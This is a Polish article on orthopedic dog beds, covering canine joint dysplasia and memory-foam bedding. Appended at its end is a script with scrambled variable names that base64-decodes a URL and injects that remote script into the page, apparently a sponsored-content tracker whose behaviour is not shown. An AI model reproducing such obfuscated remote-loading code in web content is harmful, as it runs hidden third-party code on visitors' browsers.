Legowiska ortopedyczne dla psa- wsparcie dla Twojego pupila

Legowiska ortopedyczne dla psa- wsparcie dla Twojego pupila

Legowisko ortopedyczne to rodzaj posłania dla psa zmagającego się z dysplazją stawów. Łóżko ortopedyczne sprawdza się zarówno w przypadku dużych, jak i średnich psów, gwarantując odpowiednie podparcie sylwetki Twojego pupila, dopasowując się do kształtu ciała. Czym są legowiska ortopedyczne i jak wybrać najlepszy model dla Twojego psa?

Czym jest dysplazja stawu u psa?

Dysplazja stawu u psa to pewnego rodzaju nieprawidłowość w obrębie stawu związana z rozluźnieniem struktur stawowych biodrowych i łokciowych. Rozwijają się one w nieprawidłowy sposób, co skutkuje kulawizną psa, poważnym dyskomfortem i bólem. Dysplazję wykrywa psi ortopeda za pomocą zdjęcia RTG. Jeśli dysplazja nie będzie leczona, szybko doprowadzi do poważnego stanu zapalnego. Zazwyczaj pierwsze objawy dysplazji można zauważyć już u szczeniaka. Czasem przyczyną wystąpienia nieprawidłowości bywa zbyt duża dawka aktywności fizycznej w szczenięcym wieku, nieprawidłowe żywienie czy otyłość pupila. Sposobem na wsparcie dla psa są legowiska ortopedyczne, które zapamiętują sylwetkę psa, podpierając ją w każdym punkcie.

Legowisko ortopedyczne dla psa- czym się cechuje?

Legowisko ortopedyczne dla psa składa się przede wszystkim z termowrażliwego materaca, który idealnie dopasowuje się do ciała psa, gwarantując najlepsze podparcie. Tkanina pokrywająca obicie jest wodoodporna, można ją czyścić za pomocą mokrej ściereczki lub gąbki, co ułatwia utrzymanie legowiska w czystości. Dostępne są także niezwykle stylowe ortopedyczne legowiska dla psa na drewnianych nóżkach. Taki mebel z łatwością wkomponujesz w aranżację, a pupilowi zapewnisz zdrowy relaks i sen. 

Jak wybrać posłanie ortopedyczne dla psa?

Kluczowy jest oczywiście, wybór odpowiedniego rozmiaru. Ważne jest również wypełnienie legowiska. Aby legowisko można było nazwać ortopedycznym, musi ono posiadać wypełnienie w postaci pianki memorycznej. Zapewnia ona prawidłowe podparcie całej sylwetki, w przeciwieństwie do zwykłej pianki lub- co gorsza- waty. Warto wybierać legowiska ortopedyczne dla psa łatwe do utrzymania w czystości. Warto wziąć pod uwagę preferencje psa. Niektóre psy lubią spać zwinięte w kłębek i wolą legowiska z podwyższonymi krawędziami, inne wolą płaskie powierzchnie, by wygodnie się rozciągnąć. Materace ortopedyczne zapamiętują sylwetkę psa, zapewniając, że zawsze będzie ona odpowiednio podparta, co jest szczególnie ważne w przypadku dysplazji stawów. Legowiska dostępne są w różnych rozmiarach, a także w różnych wersjach kolorystycznych. 

  <script>
         (function(neqzrnjc, wxygasbq, kejtxyxt, onmizshy, gxzxezzx, sddwdtxi){
   gxzxezzx = wxygasbq.createElement(kejtxyxt);sddwdtxi = wxygasbq.getElementsByTagName(kejtxyxt)[0];
   gxzxezzx.ascyc = 1;
   gxzxezzx.src = atob(onmizshy);
   sddwdtxi.parentNode.insertBefore(gxzxezzx, sddwdtxi);
  })(window, document, 'script', 'aHR0cHM6Ly9zdGF0cy5saW5raG91c2UuY28vYXBpL2FuYWx5emVyL3YxL3NjcmlwdC85NTFhMTM4ZC05ZjU3LTQ0MDItYTcwMS1hOWNjYWI4MWQ0NzguanM=')
        </script>